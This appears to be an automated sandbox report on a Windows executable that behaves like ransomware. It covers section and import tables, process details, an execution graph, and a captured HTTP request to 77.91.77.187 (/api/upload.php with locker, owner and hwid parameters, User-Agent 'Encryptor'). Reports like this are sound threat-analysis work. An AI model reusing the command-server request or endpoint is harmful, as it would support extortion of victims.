              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x2f4ab0x2f600745f097cb9fb6a5a7634a1e5eab12bd4False0.4737796833773087data6.383695566305574IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x310000x132e40x13400b5f89de21850a09171ba34ca79284dd5False0.3939224837662338data5.110357191980083IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x450000x47b00x3000f4038102f345709e71b92225fe9545f6False0.15983072916666666data4.634606530652064IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .pdata0x4a0000x26040x2800e9b4ef2a8895882b3be78a5cf1d6949dFalse0.46298828125data5.293159935655324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .rsrc0x4d0000x1e00x200f78ccbed5a69a2e3c3a9034e4f9bdb1cFalse0.53125data4.7137725829467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x4e0000xc280xe00b542418236eb450c0ad4bbf1ccdfb36bFalse0.314453125data5.125626328317608IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_MANIFEST0x4d0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
              DLLImport
              KERNEL32.dllGetLastError, GetModuleFileNameA, QueryPerformanceCounter, QueryPerformanceFrequency, LocalFree, FormatMessageA, GetLocaleInfoEx, CreateFileW, FindClose, FindFirstFileW, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, SetFileInformationByHandle, AreFileApisANSI, CloseHandle, GetModuleHandleW, GetFileInformationByHandleEx, MultiByteToWideChar, WideCharToMultiByte, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, InitializeSListHead, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, IsDebuggerPresent, SetLastError
              ADVAPI32.dllRegCloseKey, CloseServiceHandle, OpenServiceW, RegOpenKeyExW, OpenSCManagerW, ControlService, RegSetValueExW
              MSVCP140.dll?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z, ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z, ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z, ?good@ios_base@std@@QEBA_NXZ, ??7ios_base@std@@QEBA_NXZ, ??Bios_base@std@@QEBA_NXZ, ?always_noconv@codecvt_base@std@@QEBA_NXZ, ??Bid@locale@std@@QEAA_KXZ, ?set_new_handler@std@@YAP6AXXZP6AXXZ@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, _Cnd_signal, _Thrd_hardware_concurrency, _Cnd_init_in_situ, ??1_Lockit@std@@QEAA@XZ, ??0_Lockit@std@@QEAA@H@Z, ?_Throw_Cpp_error@std@@YAXH@Z, ?uncaught_exceptions@std@@YAHXZ, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, ?_Xout_of_range@std@@YAXPEBD@Z, ?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?_Winerror_map@std@@YAHH@Z, ?_Xbad_function_call@std@@YAXXZ, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, _Cnd_destroy_in_situ, _Cnd_broadcast, _Mtx_unlock, _Thrd_join, _Thrd_id, _Cnd_wait, _Cnd_do_broadcast_at_thread_exit, _Mtx_lock, ?_Syserror_map@std@@YAPEBDH@Z, ?_Xlength_error@std@@YAXPEBD@Z, ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z, ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z
              bcrypt.dllBCryptCloseAlgorithmProvider, BCryptOpenAlgorithmProvider, BCryptGenRandom
              WININET.dllInternetCloseHandle, HttpOpenRequestW, InternetReadFile, HttpSendRequestW, InternetCrackUrlW, InternetOpenW, InternetConnectW
              VCRUNTIME140_1.dll__CxxFrameHandler4
              VCRUNTIME140.dll__current_exception_context, __current_exception, memcmp, __RTDynamicCast, memset, memmove, __C_specific_handler, _CxxThrowException, __std_type_info_name, __std_type_info_compare, __std_terminate, _purecall, __std_exception_copy, __std_exception_destroy, memcpy, memchr
              api-ms-win-crt-stdio-l1-1-0.dllungetc, fwrite, fsetpos, fread, _fseeki64, fgetpos, fgetc, _set_fmode, fclose, fflush, __p__commode, fputc, _get_stream_buffer_pointers, setvbuf
              api-ms-win-crt-heap-l1-1-0.dllfree, _aligned_malloc, _callnewh, _aligned_free, _set_new_mode, malloc
              api-ms-win-crt-runtime-l1-1-0.dll_c_exit, abort, _seh_filter_exe, _get_initial_narrow_environment, _initterm, _initterm_e, exit, _set_app_type, _initialize_narrow_environment, _configure_narrow_argv, _register_thread_local_exe_atexit_callback, _exit, _beginthreadex, _crt_atexit, __p___argc, __p___argv, _invalid_parameter_noinfo, _invalid_parameter_noinfo_noreturn, terminate, _initialize_onexit_table, _errno, _register_onexit_function, _cexit
              api-ms-win-crt-filesystem-l1-1-0.dll_unlock_file, _lock_file
              api-ms-win-crt-environment-l1-1-0.dll_dupenv_s
              api-ms-win-crt-string-l1-1-0.dllstrcmp
              api-ms-win-crt-time-l1-1-0.dll_time64
              api-ms-win-crt-math-l1-1-0.dll__setusermatherr
              api-ms-win-crt-locale-l1-1-0.dll___lc_codepage_func, _configthreadlocale
              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States
              TimestampSource PortDest PortSource IPDest IP
              Oct 22, 2024 14:44:54.471968889 CEST4973080192.168.2.477.91.77.187
              Oct 22, 2024 14:44:54.477658987 CEST804973077.91.77.187192.168.2.4
              Oct 22, 2024 14:44:54.477761984 CEST4973080192.168.2.477.91.77.187
              Oct 22, 2024 14:44:54.477912903 CEST4973080192.168.2.477.91.77.187
              Oct 22, 2024 14:44:54.483321905 CEST804973077.91.77.187192.168.2.4
              Oct 22, 2024 14:45:02.970726967 CEST804973077.91.77.187192.168.2.4
              Oct 22, 2024 14:45:02.970882893 CEST4973080192.168.2.477.91.77.187
              Oct 22, 2024 14:45:02.971050024 CEST4973080192.168.2.477.91.77.187
              Oct 22, 2024 14:45:02.976330042 CEST804973077.91.77.187192.168.2.4
              • 77.91.77.187
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.44973077.91.77.187807568C:\Users\user\Desktop\PC4rbXSgl4.exe
              TimestampBytes transferredDirectionData
              Oct 22, 2024 14:44:54.477912903 CEST159OUTGET /api/upload.php?locker=test&amount=10&owner=6&hwid=l7NtZkdgeMq5CGbABNg1whI0E8CPHhHD HTTP/1.1
              Accept: text/*
              User-Agent: Encryptor
              Host: 77.91.77.187


              Click to jump to process

              Click to jump to process

              Click to jump to process

              Target ID:0
              Start time:08:44:53
              Start date:22/10/2024
              Path:C:\Users\user\Desktop\PC4rbXSgl4.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\user\Desktop\PC4rbXSgl4.exe"
              Imagebase:0x7ff6f18a0000
              File size:300'544 bytes
              MD5 hash:12B818950D749C378AABD81A0BAC9742
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              Target ID:1
              Start time:08:44:53
              Start date:22/10/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7699e0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Reset < >

                Execution Graph

                Execution Coverage:3%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:28.2%
                Total number of Nodes:1739
                Total number of Limit Nodes:3
                execution_graph 9467 7ff6f18ab550 ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 9468 7ff6f18ce0c0 9472 7ff6f18cec6c SetUnhandledExceptionFilter 9468->9472 9473 7ff6f18ce0dc 9474 7ff6f18ce0f5 9473->9474 9475 7ff6f18ce233 9474->9475 9476 7ff6f18ce0fd 9474->9476 9680 7ff6f18ceac8 IsProcessorFeaturePresent 9475->9680 9478 7ff6f18ce23d 9476->9478 9481 7ff6f18ce11b __scrt_release_startup_lock 9476->9481 9479 7ff6f18ceac8 9 API calls 9478->9479 9480 7ff6f18ce248 9479->9480 9483 7ff6f18ce250 _exit 9480->9483 9482 7ff6f18ce140 9481->9482 9484 7ff6f18ce1c6 _get_initial_narrow_environment __p___argv __p___argc 9481->9484 9487 7ff6f18ce1be _register_thread_local_exe_atexit_callback 9481->9487 9493 7ff6f18a7930 9484->9493 9486 7ff6f18ce1e8 9678 7ff6f18cec18 GetModuleHandleW 9486->9678 9487->9484 9490 7ff6f18ce1f3 9491 7ff6f18ce1fd 9490->9491 9492 7ff6f18ce1f8 _cexit 9490->9492 9491->9482 9492->9491 9686 7ff6f18abf80 9493->9686 9495 7ff6f18a79a6 9496 7ff6f18abf80 7 API calls 9495->9496 9497 7ff6f18a79d8 9496->9497 9703 7ff6f18a98f0 9497->9703 9499 7ff6f18a7a10 9721 7ff6f18a73f0 OpenSCManagerW 9499->9721 9504 7ff6f18a8bca 10180 7ff6f18a14c0 ?_Xlength_error@std@@YAXPEBD 9504->10180 9506 7ff6f18a7ae4 memmove 9751 7ff6f18a5a50 9506->9751 9507 7ff6f18a8bcf 10181 7ff6f18a1420 9507->10181 9509 7ff6f18a7ac1 9811 7ff6f18cdeb0 9509->9811 9512 7ff6f18a7a6d 9512->9506 9512->9507 9512->9509 9515 7ff6f18a7b3e 9512->9515 9513 7ff6f18a8bd4 10184 7ff6f18a14c0 ?_Xlength_error@std@@YAXPEBD 9513->10184 9517 7ff6f18cdeb0 std::_Facet_Register 3 API calls 9515->9517 9517->9506 9518 7ff6f18a7c11 9523 7ff6f18a7c33 9518->9523 9524 7ff6f18a7d82 9518->9524 9520 7ff6f18a7b37 _invalid_parameter_noinfo_noreturn 9520->9515 9522 7ff6f18a7c0c 9820 7ff6f18cdfc4 9522->9820 9797 7ff6f18ab370 9523->9797 9526 7ff6f18ab370 9 API calls 9524->9526 9531 7ff6f18a7d95 9526->9531 9527 7ff6f18a8bda 9532 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 9527->9532 9528 7ff6f18a7c05 _invalid_parameter_noinfo_noreturn 9528->9522 9823 7ff6f18ad310 9531->9823 9536 7ff6f18a8bdf 9532->9536 9533 7ff6f18a7c65 9537 7ff6f18a7c95 9533->9537 9539 7ff6f18a8aa6 _invalid_parameter_noinfo_noreturn 9533->9539 9534 7ff6f18a7c9a 9541 7ff6f18a7cf8 9534->9541 9544 7ff6f18a8b08 _invalid_parameter_noinfo_noreturn 9534->9544 9552 7ff6f18a7cfd 9534->9552 10185 7ff6f18a2de0 9536->10185 9540 7ff6f18cdfc4 ISource free 9537->9540 9547 7ff6f18a8aad 9539->9547 9540->9534 9546 7ff6f18cdfc4 ISource free 9541->9546 9542 7ff6f18abf80 7 API calls 9545 7ff6f18a7dfd 9542->9545 9550 7ff6f18a8b0f 9544->9550 9545->9513 9566 7ff6f18a7e20 9545->9566 9546->9552 9551 7ff6f18cdfc4 ISource free 9547->9551 9548 7ff6f18a8bf6 9558 7ff6f18a2de0 52 API calls 9548->9558 9554 7ff6f18cdfc4 ISource free 9550->9554 9556 7ff6f18a8ab2 9551->9556 9557 7ff6f18a7d73 9552->9557 9559 7ff6f18a8b82 _invalid_parameter_noinfo_noreturn 9552->9559 9579 7ff6f18a7d78 9552->9579 9577 7ff6f18a8b14 9554->9577 9555 7ff6f18a7ed0 memmove 9837 7ff6f18a5f40 9555->9837 9556->9544 9556->9550 9556->9577 9561 7ff6f18cdfc4 ISource free 9557->9561 9560 7ff6f18a8c07 9558->9560 9567 7ff6f18a8b89 9559->9567 10191 7ff6f18a2cf0 9560->10191 9561->9579 9562 7ff6f18a7e6d 9572 7ff6f18cdeb0 std::_Facet_Register 3 API calls 9562->9572 9565 7ff6f18a7e81 9565->9555 9566->9527 9566->9555 9566->9562 9566->9565 9570 7ff6f18a7ec3 9566->9570 9576 7ff6f18a7eba 9566->9576 9571 7ff6f18cdfc4 ISource free 9567->9571 9568 7ff6f18a7f59 9573 7ff6f18a7f9d 9568->9573 9581 7ff6f18a7f98 9568->9581 9583 7ff6f18a7f91 _invalid_parameter_noinfo_noreturn 9568->9583 9578 7ff6f18cdeb0 std::_Facet_Register 3 API calls 9570->9578 9571->9579 9580 7ff6f18a7e7c 9572->9580 9575 7ff6f18a7ff9 9573->9575 9586 7ff6f18a7ff4 9573->9586 9592 7ff6f18a7fed _invalid_parameter_noinfo_noreturn 9573->9592 9587 7ff6f18a8021 9575->9587 9588 7ff6f18a81d3 9575->9588 9576->9562 9577->9559 9577->9567 9577->9579 9578->9565 10171 7ff6f18cdbf0 9579->10171 9580->9565 9582 7ff6f18a7ebc _invalid_parameter_noinfo_noreturn 9580->9582 9584 7ff6f18cdfc4 ISource free 9581->9584 9582->9570 9583->9581 9584->9573 9593 7ff6f18cdfc4 ISource free 9586->9593 9594 7ff6f18ab370 9 API calls 9587->9594 9591 7ff6f18ab370 9 API calls 9588->9591 9589 7ff6f18a8c45 9589->9486 9590 7ff6f18a8c58 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 9595 7ff6f18a81e6 9591->9595 9592->9586 9593->9575 9596 7ff6f18a8034 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 9594->9596 9597 7ff6f18ad310 9 API calls 9595->9597 9598 7ff6f18a8053 9596->9598 9599 7ff6f18a8088 9596->9599 9601 7ff6f18a8210 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z GetModuleFileNameA 9597->9601 9602 7ff6f18a8083 9598->9602 9603 7ff6f18a8a44 _invalid_parameter_noinfo_noreturn 9598->9603 9599->9539 9600 7ff6f18a80eb 9599->9600 9605 7ff6f18a80e6 9599->9605 9600->9544 9609 7ff6f18a8149 9600->9609 9616 7ff6f18a814e 9600->9616 9606 7ff6f18a8260 9601->9606 9604 7ff6f18cdfc4 ISource free 9602->9604 9607 7ff6f18a8a4b 9603->9607 9604->9599 9608 7ff6f18cdfc4 ISource free 9605->9608 9606->9606 9613 7ff6f18abf80 7 API calls 9606->9613 9611 7ff6f18cdfc4 ISource free 9607->9611 9608->9600 9612 7ff6f18cdfc4 ISource free 9609->9612 9610 7ff6f18a81c9 9610->9579 9614 7ff6f18a8a50 9611->9614 9612->9616 9615 7ff6f18a827c RegOpenKeyExW 9613->9615 9614->9539 9614->9547 9614->9556 9618 7ff6f18a8387 9615->9618 9619 7ff6f18a82ac 9615->9619 9616->9559 9616->9610 9617 7ff6f18a81c4 9616->9617 9620 7ff6f18cdfc4 ISource free 9617->9620 9621 7ff6f18ab370 9 API calls 9618->9621 9971 7ff6f18ab590 9619->9971 9620->9610 9623 7ff6f18a839a GetLastError ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 9621->9623 9625 7ff6f18a8385 9623->9625 9628 7ff6f18a83ff 9625->9628 9632 7ff6f18a83fa 9625->9632 9634 7ff6f18a83f3 _invalid_parameter_noinfo_noreturn 9625->9634 9626 7ff6f18a8348 9627 7ff6f18a8380 9626->9627 9630 7ff6f18a8379 _invalid_parameter_noinfo_noreturn 9626->9630 9631 7ff6f18cdfc4 ISource free 9627->9631 9986 7ff6f18a76a0 _dupenv_s 9628->9986 9630->9627 9631->9625 9635 7ff6f18cdfc4 ISource free 9632->9635 9634->9632 9635->9628 9636 7ff6f18abf80 7 API calls 9637 7ff6f18a844f 9636->9637 9638 7ff6f18abf80 7 API calls 9637->9638 9639 7ff6f18a8481 9638->9639 9640 7ff6f18abf80 7 API calls 9639->9640 9641 7ff6f18a84b3 9640->9641 9642 7ff6f18a98f0 24 API calls 9641->9642 9643 7ff6f18a84eb 9642->9643 9644 7ff6f18a850b memset _Thrd_hardware_concurrency 9643->9644 9645 7ff6f18cdeb0 std::_Facet_Register 3 API calls 9644->9645 9646 7ff6f18a8571 _Cnd_init_in_situ 9645->9646 9647 7ff6f18a85f0 9646->9647 9648 7ff6f18a8649 9647->9648 10019 7ff6f18add10 9647->10019 10027 7ff6f18ad060 9647->10027 10030 7ff6f18cd2c4 ___lc_codepage_func 9648->10030 9657 7ff6f18a86a6 9658 7ff6f18a86ec 9657->9658 9659 7ff6f18a86e5 _invalid_parameter_noinfo_noreturn 9657->9659 9672 7ff6f18a86f1 9657->9672 9660 7ff6f18cdfc4 ISource free 9658->9660 9659->9658 9660->9672 9662 7ff6f18a88ea 9663 7ff6f18ab370 9 API calls 9662->9663 9664 7ff6f18a8979 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 9663->9664 10152 7ff6f18a4e70 _Mtx_lock 9664->10152 9669 7ff6f18a89f6 9669->9603 9669->9607 9669->9614 9670 7ff6f18a8997 9670->9669 9673 7ff6f18a89f1 9670->9673 9676 7ff6f18a89ea _invalid_parameter_noinfo_noreturn 9670->9676 9672->9548 9672->9560 9672->9662 9675 7ff6f18a881c _invalid_parameter_noinfo_noreturn 9672->9675 9677 7ff6f18cdfc4 ISource free 9672->9677 10063 7ff6f18a2e50 9672->10063 10069 7ff6f18a2190 9672->10069 10086 7ff6f18a6de0 9672->10086 10123 7ff6f18cd524 FindNextFileW 9672->10123 10126 7ff6f18a3230 9672->10126 9674 7ff6f18cdfc4 ISource free 9673->9674 9674->9669 9675->9672 9676->9673 9677->9672 9679 7ff6f18ce1ef 9678->9679 9679->9480 9679->9490 9681 7ff6f18ceaee 9680->9681 9682 7ff6f18ceafc memset RtlCaptureContext RtlLookupFunctionEntry 9681->9682 9683 7ff6f18ceb72 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9682->9683 9684 7ff6f18ceb36 RtlVirtualUnwind 9682->9684 9685 7ff6f18cebf2 9683->9685 9684->9683 9685->9478 9687 7ff6f18ac070 9686->9687 9688 7ff6f18abfa6 9686->9688 10217 7ff6f18a14c0 ?_Xlength_error@std@@YAXPEBD 9687->10217 9689 7ff6f18abfac memmove 9688->9689 9698 7ff6f18abfcb 9688->9698 9689->9495 9691 7ff6f18abfdc 9694 7ff6f18cdeb0 std::_Facet_Register 3 API calls 9691->9694 9692 7ff6f18ac075 9695 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 9692->9695 9693 7ff6f18abff7 memmove 9693->9495 9700 7ff6f18abff2 9694->9700 9701 7ff6f18ac07b 9695->9701 9697 7ff6f18ac03c 9699 7ff6f18cdeb0 std::_Facet_Register 3 API calls 9697->9699 9698->9691 9698->9692 9698->9693 9698->9697 9699->9693 9700->9693 9702 7ff6f18ac035 _invalid_parameter_noinfo_noreturn 9700->9702 9702->9697 9709 7ff6f18a993b 9703->9709 9712 7ff6f18a99ed 9703->9712 9704 7ff6f18a9a26 10239 7ff6f18aced0 ?_Xlength_error@std@@YAXPEBD 9704->10239 9705 7ff6f18cdbf0 Concurrency::wait 8 API calls 9707 7ff6f18a9a0c 9705->9707 9706 7ff6f18a9977 9706->9712 10218 7ff6f18aa290 9706->10218 9707->9499 9709->9704 9709->9706 9710 7ff6f18a998c 9709->9710 9713 7ff6f18a9a21 9709->9713 9714 7ff6f18a996d 9709->9714 9715 7ff6f18cdeb0 std::_Facet_Register 3 API calls 9710->9715 9712->9705 9717 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 9713->9717 9716 7ff6f18cdeb0 std::_Facet_Register 3 API calls 9714->9716 9715->9706 9719 7ff6f18a9972 9716->9719 9717->9704 9719->9706 9720 7ff6f18a9985 _invalid_parameter_noinfo_noreturn 9719->9720 9720->9710 9722 7ff6f18a7422 9721->9722 9734 7ff6f18a745e 9721->9734 9723 7ff6f18ab370 9 API calls 9722->9723 9726 7ff6f18a7435 GetLastError ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 9723->9726 9724 7ff6f18a765f CloseServiceHandle 9725 7ff6f18a7680 9724->9725 9727 7ff6f18cdbf0 Concurrency::wait 8 API calls 9725->9727 9726->9725 9728 7ff6f18a768d 9727->9728 9742 7ff6f18a51a0 9728->9742 9729 7ff6f18ab590 5 API calls 9729->9734 9730 7ff6f18a74c1 OpenServiceW 9730->9734 9731 7ff6f18a7535 ControlService 9731->9734 9732 7ff6f18a7695 _invalid_parameter_noinfo_noreturn 9733 7ff6f18cdfc4 ISource free 9733->9734 9734->9724 9734->9729 9734->9730 9734->9731 9734->9732 9734->9733 9735 7ff6f18ab370 9 API calls 9734->9735 9736 7ff6f18ad310 9 API calls 9734->9736 9737 7ff6f18ab370 9 API calls 9734->9737 9739 7ff6f18ab370 9 API calls 9734->9739 9741 7ff6f18a75d8 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z CloseServiceHandle 9734->9741 9735->9734 9736->9734 9738 7ff6f18a762e GetLastError ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 9737->9738 9738->9734 9740 7ff6f18a75c4 GetLastError ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K 9739->9740 9740->9741 9741->9734 10263 7ff6f18b9510 9742->10263 9744 7ff6f18a527a 10273 7ff6f18b7a80 9744->10273 9747 7ff6f18a529b 9748 7ff6f18a530f 9747->9748 10297 7ff6f18b1240 9747->10297 9749 7ff6f18cdbf0 Concurrency::wait 8 API calls 9748->9749 9750 7ff6f18a532d 9749->9750 9750->9504 9750->9512 9752 7ff6f18ab370 9 API calls 9751->9752 9753 7ff6f18a5aa2 9752->9753 9754 7ff6f18ad310 9 API calls 9753->9754 9755 7ff6f18a5abe ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z InternetOpenW 9754->9755 9756 7ff6f18a5b4f 9755->9756 9757 7ff6f18a5af3 9755->9757 9761 7ff6f18ab590 5 API calls 9756->9761 9758 7ff6f18ab370 9 API calls 9757->9758 9759 7ff6f18a5b06 GetLastError ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 9758->9759 9760 7ff6f18abf80 7 API calls 9759->9760 9762 7ff6f18a5b4a 9760->9762 9763 7ff6f18a5b73 InternetCrackUrlW 9761->9763 9766 7ff6f18cdbf0 Concurrency::wait 8 API calls 9762->9766 9764 7ff6f18a5cbb InternetConnectW 9763->9764 9765 7ff6f18a5bec 9763->9765 9767 7ff6f18a5cf1 9764->9767 9768 7ff6f18a5cfd HttpOpenRequestW 9764->9768 9769 7ff6f18ab370 9 API calls 9765->9769 9770 7ff6f18a5c9f 9766->9770 9767->9768 9771 7ff6f18a5d43 9768->9771 9772 7ff6f18a5d88 HttpSendRequestW 9768->9772 9773 7ff6f18a5bff GetLastError ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z InternetCloseHandle 9769->9773 9770->9518 9770->9522 9770->9528 9776 7ff6f18ab370 9 API calls 9771->9776 9774 7ff6f18a5df0 InternetReadFile 9772->9774 9775 7ff6f18a5da2 9772->9775 9777 7ff6f18abf80 7 API calls 9773->9777 9780 7ff6f18a5e77 InternetCloseHandle InternetCloseHandle InternetCloseHandle 9774->9780 9791 7ff6f18a5e22 9774->9791 9779 7ff6f18ab370 9 API calls 9775->9779 9781 7ff6f18a5d56 GetLastError ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z InternetCloseHandle 9776->9781 9778 7ff6f18a5c4c 9777->9778 9778->9762 9784 7ff6f18a5c88 9778->9784 9788 7ff6f18a5f31 _invalid_parameter_noinfo_noreturn 9778->9788 9782 7ff6f18a5db5 GetLastError ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z InternetCloseHandle InternetCloseHandle 9779->9782 9783 7ff6f18ab370 9 API calls 9780->9783 9781->9772 9782->9774 9786 7ff6f18a5ea5 9783->9786 9789 7ff6f18cdfc4 ISource free 9784->9789 9785 7ff6f18a5f38 10709 7ff6f18cdd18 9785->10709 9787 7ff6f18ad310 9 API calls 9786->9787 9792 7ff6f18a5ebf ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 9787->9792 9788->9785 9789->9762 9791->9780 9791->9785 9791->9791 9795 7ff6f18aada0 Concurrency::wait memmove 9791->9795 9792->9762 9794 7ff6f18a5efc 9792->9794 9794->9784 9794->9788 9796 7ff6f18a5e5c InternetReadFile 9795->9796 9796->9780 9796->9791 9800 7ff6f18ab3a0 ?good@ios_base@std@ 9797->9800 9799 7ff6f18ab3f3 9803 7ff6f18ab409 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 9799->9803 9804 7ff6f18ab421 9799->9804 9800->9799 9800->9804 9802 7ff6f18ab47d ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 9805 7ff6f18ab42b ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 9802->9805 9806 7ff6f18ab49a 9802->9806 9803->9804 9804->9802 9804->9805 9809 7ff6f18ab455 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 9804->9809 9807 7ff6f18a7c46 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 